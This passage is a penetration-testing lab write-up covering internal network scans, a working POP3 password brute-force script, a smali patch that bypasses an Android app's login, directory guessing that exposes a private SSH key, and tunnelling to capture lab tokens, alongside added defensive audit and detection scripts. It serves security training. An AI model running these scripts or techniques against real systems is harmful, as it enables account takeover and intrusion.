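        os.path.join(www, "config.php"): (b"<?php // constructed\n", 0o777),
    }
    for path, (content, mode) in files.items():
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    os.chmod(docs, 0o755)                                  # drwxr-xr-x
    os.chmod(os.path.join(base, "users", "rross"), 0o751)  # drwxr-x--x
    os.chmod(os.path.join(base, "users"), 0o751)           # enter, no listing
    os.chmod(www, 0o755)


def run_demo():
    """Build the sample tree, audit it, return findings with relative paths."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        return [(issue, os.path.relpath(path, base))
                for issue, path in audit_tree(base)]


if __name__ == "__main__":
    for issue, path in run_demo():
        print(issue, path)
```

Each finding has a direct fix: drop the "other" execute bit on the parent directory, set private keys to 0600, and remove the "other" write bit from configuration files.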

I start by nmaping that host from the box that I'm already in.

[email protected]:/tmp/.test$ nmap -A -sV -v -Pn -p- -n -oA ssh-test 172.16.0.1

Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:16 MSK
NSE: Loaded 93 scripts for scanning.
NSE: Script Pre-scanning.
Initiating Connect Scan at 18:16
Scanning 172.16.0.1 [65535 ports]
Discovered open port 1392/tcp on 172.16.0.1
Completed Connect Scan at 18:16, 4.09s elapsed (65535 total ports)
Initiating Service scan at 18:16
Scanning 1 service on 172.16.0.1
Completed Service scan at 18:16, 0.01s elapsed (1 service on 1 host)
NSE: Script scanning 172.16.0.1.
Initiating NSE at 18:16
Completed NSE at 18:16, 0.03s elapsed
Nmap scan report for 172.16.0.1
Host is up (0.0013s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE VERSION
1392/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

NSE: Script Post-scanning.
Initiating NSE at 18:16
Completed NSE at 18:16, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.50 seconds

However, I can't seem to connect via SSH. I decide to check with netcat.

[email protected]:/tmp/.test$ nc -nvv 172.16.0.1 1392
(UNKNOWN) [172.16.0.1] 1392 (?) : Connection refused
 sent 0, rcvd 0

Running nmap again.

[email protected]:/tmp/.test$ nmap -A -sV -Pn -p- -n -oA ssh-test 172.16.0.1

Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:32 MSK
Nmap scan report for 172.16.0.1
Host is up (0.00034s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
35084/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds

That's odd... Running another nmap

[email protected]:/tmp/.test$ nmap -A -sV -Pn -p- -n -oA ssh-test 172.16.0.1

Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:33 MSK
Nmap scan report for 172.16.0.1
Host is up (0.00098s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
38088/tcp open  ssh     OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds

So the box is changing its listening port. More specifically, as consecutive nmap scans show, the port changes every few seconds. There is enough time to try for a connection. However, the private key I got doesn't seem to be working.

[email protected]:~/Documents/pentestit# ssh -i keys [email protected] -p14277
Permission denied (publickey).

Oh well, let's leave this host for now, and I'll come back to it once I've got some more keys. At this point I take a step back to see where I stand.

While thinking about the next course of action, I remember I have a big list of emails that I still haven't actually used other than bruteforcing 3 of them.

However, things are different now. I have a foothold on the network, so I can try to bruteforce some mail accounts without going over the internet, using the LAN speed between the boxes to do it much faster without worrying about it.

First, I nmap the "mail" box from within the network.

[email protected]:~$ nmap -A -sV -T4 -p- -Pn -n 172.16.0.7

Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-09 14:11 MSK
Nmap scan report for 172.16.0.7
Host is up (0.00069s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE                VERSION
22/tcp    open  ssh                    OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 1024 cc:70:0e:29:56:10:5b:84:c0:fb:7a:6b:f1:2b:bc:c9 (DSA)
|_2048 cb:c1:5a:0c:a2:72:16:af:3d:40:f3:e6:26:be:22:0a (RSA)
25/tcp    open  smtp                   CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
106/tcp   open  pop3pw?
110/tcp   open  tcpwrapped
|_pop3-capabilities: USER IMPLEMENTATION(CommuniGatePro) UIDL APOP TOP OK(K capability list follows) STLS PIPELINING LAST SASL(LOGIN PLAIN CRAM-MD5 DIGEST-MD5 GSSAPI MSN NTLM)
111/tcp   open  rpcbind (rpcbind V2-4) 2-4 (rpc #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          35159/tcp  status
|_  100024  1          39861/udp  status
143/tcp   open  imap
|_imap-capabilities: LOGIN-REFERRALS AUTH=GSSAPI QUOTA UNSELECT AUTH=NTLMA0001 LISTEXT AUTH=LOGIN ID completed AUTH=DIGEST-MD5 CHILDREN BINARY OK IMAP4REV1 IMAP4 AUTH=CRAM-MD5 AUTH=MSN AUTH=PLAIN STARTTLS ACL SASL-IR ESEARCH UIDPLUS LITERAL+ IDLE NAMESPACE MULTIAPPEND
389/tcp   open  ldap                   (Anonymous bind OK)
636/tcp   open  ssl/ldap               (Anonymous bind OK)
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
674/tcp   open  acap                   CommuniGate Pro ACAP server 6.0.9 (for mail client preference sharing)
993/tcp   open  ssl/imap
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
|_imap-capabilities: LOGIN-REFERRALS AUTH=GSSAPI QUOTA UNSELECT AUTH=NTLMA0001 LISTEXT AUTH=LOGIN ID AUTH=DIGEST-MD5 CHILDREN BINARY completed IMAP4REV1 IMAP4 OK AUTH=MSN AUTH=CRAM-MD5 AUTH=PLAIN ACL SASL-IR ESEARCH UIDPLUS LITERAL+ IDLE NAMESPACE MULTIAPPEND
3478/tcp  open  unknown
5060/tcp  open  sip-proxy              CommuniGatePro VoIP Gateway 6.0.9
5061/tcp  open  ssl/sip-tls?
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
5222/tcp  open  xmpp-client?
5223/tcp  open  ssl/hpvirtgrp?
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
5269/tcp  open  xmpp-server?
5349/tcp  open  ssl/unknown
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
8010/tcp  open  http                   CommuniGate Pro httpd 6.0.9
8021/tcp  open  ftp
8100/tcp  open  http                   CommuniGate Pro httpd 6.0.9
| http-methods: Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title:  CommuniGate Pro gds.lab Entrance
9010/tcp  open  ssl/http               CommuniGate Pro httpd 6.0.9
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after:  2028-02-02 00:00:00
9100/tcp  open  jetdirect?
11024/tcp open  unknown
35159/tcp open  status (status V1)     1 (rpc #100024)
6 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
Service Info: Host: gds.lab

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.35 seconds

One hell of an output. And mail ports are open. So I'm good to go.

Now, I need to do the bruteforcing locally from the box I'm already in, using a script, so all I have to do is upload a password-list, a list with the users, and well, write the script itself.

For the passlist I will use rockyou-50.txt, which is contained in SecLists and contains these passwords from the original rockyou with a 50% chance of success. The user list is the following


And finally, the script.

import poplib
from multiprocessing import Pool
import logging

global credentials
credentials = []
global found
found = []
logger = logging.getLogger('test')
hdlr = logging.FileHandler('log.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.DEBUG)

def Mailer(a):
 result = ''
 if a.split(':')[0] in found:
  pass
 else:
  try:
   Mailer = poplib.POP3('172.16.0.7')
   Mailer.user(a.split(':')[0])
   result = Mailer.pass_(a.split(':')[1])
  except:
   pass
  logger.info('Run: ' + a)
  if 'OK' in result:
   print a
   found.append(a.split(':')[0])

if __name__ == '__main__':
 pool = Pool(processes=50)
 with open('users.txt') as users:
  for user in users:
   credentials = []
   with open('rockyou-50.txt') as passwords:
    for password in passwords:
     credentials.append(user.strip()+":"+password.strip())
     logger.info('Appended: ' + user.strip()+":"+password.strip())
   pool.map(Mailer, credentials)

The script uses a pool of 50 worker processes to connect to the POP3 server and try different credentials concurrently. It also writes a log file in order to track the progress, since it's kind of a long process. Aaand let's go for it.

[email protected]:/tmp/.test$ ls -l
total 32200
-rw-r--r-- 1 e.lindsey e.lindsey     1284 Feb  9 13:35 brute.py
-rw-r--r-- 1 e.lindsey e.lindsey 32879986 Feb  9 14:21 log.log
-rw-r--r-- 1 e.lindsey e.lindsey    75912 Feb  9 12:04 rockyou-50.txt
-rw-r--r-- 1 e.lindsey e.lindsey      643 Feb  9 14:02 users.txt
[email protected]:/tmp/.test$ python brute.py 
[email protected]:justdoit

There it is! [email protected] with password justdoit. Heading over to the web ui to check it out.
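
Seen from the mail server's side, the run above is a burst of failed POP3 logins from a single internal address, ending in one success. The following detection sketch is an added example, not part of the original write-up; the log format, the source addresses and the thresholds are constructed assumptions, not CommuniGate Pro's own logging.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (an assumption, not CommuniGate Pro's own):
#   "<ISO time> POP3 <source ip> user=<name> result=<OK|FAIL>"
LINE = re.compile(r"^(\S+) POP3 (\S+) user=(\S+) result=(OK|FAIL)$")
TIME_FMT = "%Y-%m-%dT%H:%M:%S"


def sample_log():
    """Constructed events: one user with a typo, then a guessing run that ends in a hit."""
    base = datetime(2017, 2, 9, 14, 21, 0)
    lines = [
        "2017-02-09T14:20:50 POP3 172.16.0.20 user=k.barth result=FAIL",
        "2017-02-09T14:20:55 POP3 172.16.0.20 user=k.barth result=OK",
    ]
    for i in range(30):  # ten failed logins per second from one source
        ts = (base + timedelta(seconds=i // 10)).strftime(TIME_FMT)
        lines.append("%s POP3 172.16.0.8 user=a.modlin result=FAIL" % ts)
    lines.append("2017-02-09T14:21:03 POP3 172.16.0.8 user=a.modlin result=OK")
    return lines


def detect(lines, window=timedelta(seconds=60), burst=20, prior_fails=5):
    """Return (kind, source, user) alerts.

    password-guessing      : `burst` failures from one source inside `window`
    success-after-failures : a login that succeeds after at least `prior_fails`
                             failures for the same user from the same source
    """
    recent = defaultdict(deque)   # source -> timestamps of recent failures
    failed = defaultdict(int)     # (source, user) -> failures since last success
    flagged = set()               # sources already reported for guessing
    alerts = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue              # ignore lines in other formats
        ts = datetime.strptime(m.group(1), TIME_FMT)
        src, user, result = m.group(2), m.group(3), m.group(4)
        if result == "FAIL":
            q = recent[src]
            q.append(ts)
            while ts - q[0] > window:     # drop failures older than the window
                q.popleft()
            failed[(src, user)] += 1
            if len(q) >= burst and src not in flagged:
                flagged.add(src)
                alerts.append(("password-guessing", src, user))
        else:
            if failed[(src, user)] >= prior_fails:
                alerts.append(("success-after-failures", src, user))
            failed[(src, user)] = 0       # a successful login resets the counter
    return alerts


if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

The second alert kind matters most for response: it names the account whose password should be treated as known to whoever controls the source host.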

After logging in, a.modlin has 2 mails from j.wise.


The mail with Token subject:


Another token for my collection, this time for the "mail" box. Moving on with the other mail with subject Apps.


Very interesting. From what I know already, this must be about the "ssh-test" box I was looking at earlier. Grabbing a copy of that locally.

Starting up an Android Virtual Device and installing the apk through adb to see what I'm dealing with, proxying the application through Burp in case it tries to send anything out.

C:\Users\gknsb>C:\Users\gknsb\AppData\Local\Android\sdk\tools\emulator.exe -avd Test -http-proxy 127.0.0.1:8080
Hax is enabled
Hax ram_size 0x80000000
HAX is working and emulator runs in fast virt mode.
emulator: Listening for console connections on port: 5554
emulator: Serial number of this emulator (for ADB): emulator-5554

C:\Users\gknsb>adb install Documents\pentestit\gds-authenticator.apk
[100%] /data/local/tmp/gds-authenticator.apk
        pkg: /data/local/tmp/gds-authenticator.apk
Success


Any credentials I try, even the previous ones that I found, result in the same message. So I'm not able to log in normally. No requests are being made either, which I can tell since I'm watching Burp too. Let's take a look under the hood of the application.

I unzip the application as if it was a zip file and use dex2jar to convert the .dex to .jar for better inspection.

C:\Users\gknsb\Documents\pentestit\gds-authenticator-zip>C:\Users\gknsb\Documents\Tools\dex2jar-2.0\d2j-dex2jar.bat classes.dex
dex2jar classes.dex -> .\classes-dex2jar.jar

Then, I open the jar with jd-gui to browse through the code. Browsing through the code, and following the logic behind the application I notice the following.


From the looks of it, no matter what I input, the application returns false during the authentication process, and the doInBackground function is responsible for that output. So, I'm thinking about changing this "false" to "true", which should bypass the authentication no matter what credentials I use.

With apktool I decompile the app, extracting the smali files.

C:\Users\gknsb\Documents\pentestit>apktool.bat d gds-authenticator.apk
I: Using Apktool 2.2.1 on gds-authenticator.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: C:\Users\echat\AppData\Local\apktool\framework\1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...

Then, browsing through the decompiled code, the file that has to be edited is "LoginActivity$UserLoginTask.smali" and the lines that have to be changed are the following.

# virtual methods
.method protected varargs doInBackground([Ljava/lang/Void;)Ljava/lang/Boolean;
    .locals 5
    .param p1, "params"    # [Ljava/lang/Void;

    .prologue
    const/4 v4, 0x0

    .line 315
    const-wide/16 v2, 0x3e8

    :try_start_0
    invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V

    .line 316
    const/4 v1, 0x0

Changed into:

# virtual methods
.method protected varargs doInBackground([Ljava/lang/Void;)Ljava/lang/Boolean;
    .locals 5
    .param p1, "params"    # [Ljava/lang/Void;

    .prologue
    const/4 v4, 0x1

    .line 315
    const-wide/16 v2, 0x3e8

    :try_start_0
    invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V

    .line 316
    const/4 v1, 0x1

As seen from above, I am actually editing the decompiled code of the doInBackground function of the app, changing v4 and v1 variables from 0x0 (false) to 0x1 (true).

Recompiling the app, signing it, and then reinstalling it to the AVD.

C:\Users\gknsb\Documents\pentestit>apktool.bat b gds-authenticator
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...

C:\Users\gknsb\Documents\pentestit>..\Tools\dex2jar-2.0\d2j-apk-sign.bat -f -o gds-authenticator-signed.apk gds-authenticator\dist\gds-authenticator.apk
C:\Users\gknsb\Documents\pentestit>cd gds-authenticator

C:\Users\gknsb\Documents\pentestit\gds-authenticator>cd dist
C:\Users\gknsb\Documents\pentestit\gds-authenticator\dist>adb install gds-authenticator-signed.apk
[100%] /data/local/tmp/gds-authenticator-signed.apk
        pkg: /data/local/tmp/gds-authenticator-signed.apk
Success

Aaaand finally, launch the app and try any credentials, that should bypass the login form and appear as a valid login.


That's it, login bypassed, and now according to the mail I can see the port that the ssh server of box "ssh-test" is listening at, at any given time. However I only have one key at this time, the one I found in rross's directory and that doesn't seem to work. I take a minute to go back and revisit those results and I notice the following.

[email protected]:/tmp/.test$ ls -l /data/users/a.modlin/docs
ls: cannot open directory /data/users/a.modlin/docs: Permission denied
[email protected]:/tmp/.test$ ls -l /data/users/rross/docs
total 8
-rw----r-- 1 root root 1675 Nov 25 15:17 keys
-rw-r--r-- 1 root root    9 Nov 25 15:43 token.txt

I had found the key for rross in docs, but for other users docs was still receiving the "Permission denied". That means that my previous bruteforcing might not have been enough since I was looking only for directories with depth 1. I decide to change that bruteforcing script to be recursive.

import os
from string import ascii_lowercase
from itertools import product

def findSubDir(baseDir):
 for X in range(1, 5, 1):
  keywords = [''.join(i) for i in product(ascii_lowercase, repeat = X)]
  for word in keywords:
   if os.path.exists(os.path.join(baseDir, word)):
    print os.path.join(baseDir, word)
    findSubDir(os.path.join(baseDir, word))

if __name__ == "__main__":
 users = ['a.modlin', 'e.lindsey', 'g.leone', 'k.barth', 'm.howard', 'rross', 's.locklear']
 for user in users:
  findSubDir(os.path.join('/data/users', user))

Now running this new one...

[email protected]:/tmp/.test$ python dirfinder.py 
/data/users/a.modlin/tmp
/data/users/a.modlin/docs
/data/users/a.modlin/docs/key
/data/users/rross/tmp
/data/users/rross/docs
/data/users/rross/docs/keys
/data/users/s.locklear/tmp
/data/users/s.locklear/docs
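
The name guessing works because a directory that grants "other" search (x) but not read (r) permission refuses `ls` yet still answers `stat()` for any name guessed correctly, and the key it finds is readable by "other" (`-rw----r--` in the listing of rross's docs). The audit below is an added example, not part of the original write-up; the sample tree is constructed, and the modes of `a.modlin/docs` and its `key` file are assumptions inferred from the behaviour shown above.

```python
import os
import stat
import tempfile

KEY_MARKER = b"PRIVATE KEY-----"   # tail of a PEM private-key header line


def build_sample_tree():
    """Constructed tree modelled on the listings above; key contents are placeholders."""
    root = tempfile.mkdtemp(prefix="data-users-")
    pem = b"-----BEGIN RSA PRIVATE KEY-----\nplaceholder\n"
    dirs = [("a.modlin", 0o755), ("a.modlin/docs", 0o711),   # 0711 is an assumption
            ("rross", 0o755), ("rross/docs", 0o755)]
    files = [("a.modlin/docs/key", 0o604, pem),               # mode assumed
             ("rross/docs/keys", 0o604, pem),                 # -rw----r-- as listed
             ("rross/docs/token.txt", 0o644, b"constructed\n")]
    for rel, mode in dirs:
        path = os.path.join(root, rel)
        os.mkdir(path)
        os.chmod(path, mode)
    for rel, mode, data in files:
        path = os.path.join(root, rel)
        with open(path, "wb") as fh:
            fh.write(data)
        os.chmod(path, mode)
    return root


def audit(root):
    """Return sorted (relative path, finding) pairs for data exposed to 'other'.

    Run it as an account that can read the whole tree (root on a real host).
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            # o+x without o+r: listing fails, but stat() on a guessed name succeeds.
            if stat.S_ISDIR(mode) and mode & stat.S_IXOTH and not mode & stat.S_IROTH:
                findings.append((os.path.relpath(path, root), "search-only directory"))
        for name in filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode) or not mode & stat.S_IROTH:
                continue
            with open(path, "rb") as fh:
                head = fh.read(64)
            kind = "world-readable private key" if KEY_MARKER in head else "world-readable file"
            findings.append((os.path.relpath(path, root), kind))
    return sorted(findings)


def strip_other(root, findings):
    """Remove every 'other' permission bit from the reported paths.

    Assumes legitimate access is granted through owner or group instead.
    """
    for rel, _ in findings:
        path = os.path.join(root, rel)
        os.chmod(path, stat.S_IMODE(os.lstat(path).st_mode) & ~0o007)


if __name__ == "__main__":
    tree = build_sample_tree()
    for rel, finding in audit(tree):
        print("%-28s %s" % (finding, rel))
```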

Now that's interesting, a "key" appeared inside a.modlin's docs folder. Plus from the mail that he received, he is the one supposed to connect to "test-ssh" using his app for the random port that I already have. Let's see if this will work. First, I grab a local copy of the key and set the proper permissions. Then, I'll use sshuttle to create a tunnel inside that network through the ssh I already have.

[email protected]:~/Documents/pentestit# scp [email protected]:/data/users/a.modlin/docs/key ./
[email protected]'s password: 
key                                                   100% 1675    17.5KB/s   00:00
[email protected]:~/Documents/pentestit# chmod 0400 key
[email protected]:~# sshuttle -r [email protected] 172.16.0.0/24
[email protected]'s password: 
client: Connected.

With sshuttle in place and the key stored locally, I just try to connect to the internal address of ssh-test (172.16.0.1) as a.modlin, with his key, and on the port I get from the mobile app.

[email protected]:~/Documents/pentestit# ssh -i key [email protected] -p 9706
Linux tl10-test-ssh 3.2.0-4-amd64 #1 SMP Debian 3.2.81-2 x86_64
Last login: Fri Feb 24 18:18:10 2017 from 172.16.0.8
[email protected]:~$ ls -la
total 32
drwxr-x--- 3 root a.modlin 4096 Nov 25 21:17 .
drwxr-xr-x 3 root root     4096 Nov 25 20:40 ..
-rw-r----- 1 root a.modlin  257 Nov 25 20:43 .bash_history
-rw-r----- 1 root a.modlin  220 Nov 25 20:40 .bash_logout
-rw-r----- 1 root a.modlin 3392 Nov 25 20:40 .bashrc
-rw-r----- 1 root a.modlin  675 Nov 25 20:40 .profile
drwxr-x--- 2 root a.modlin 4096 Nov 25 20:41 .ssh
-rw-r--r-- 1 root root        9 Nov 25 21:17 token.txt
[email protected]:~$ cat token.txt 
EN9ahVeW

Aaand another token! At this point due to my lack of time, I didn't finish the lab before they switched to a newer one sooo bad luck, this writeup has to stay here. :/
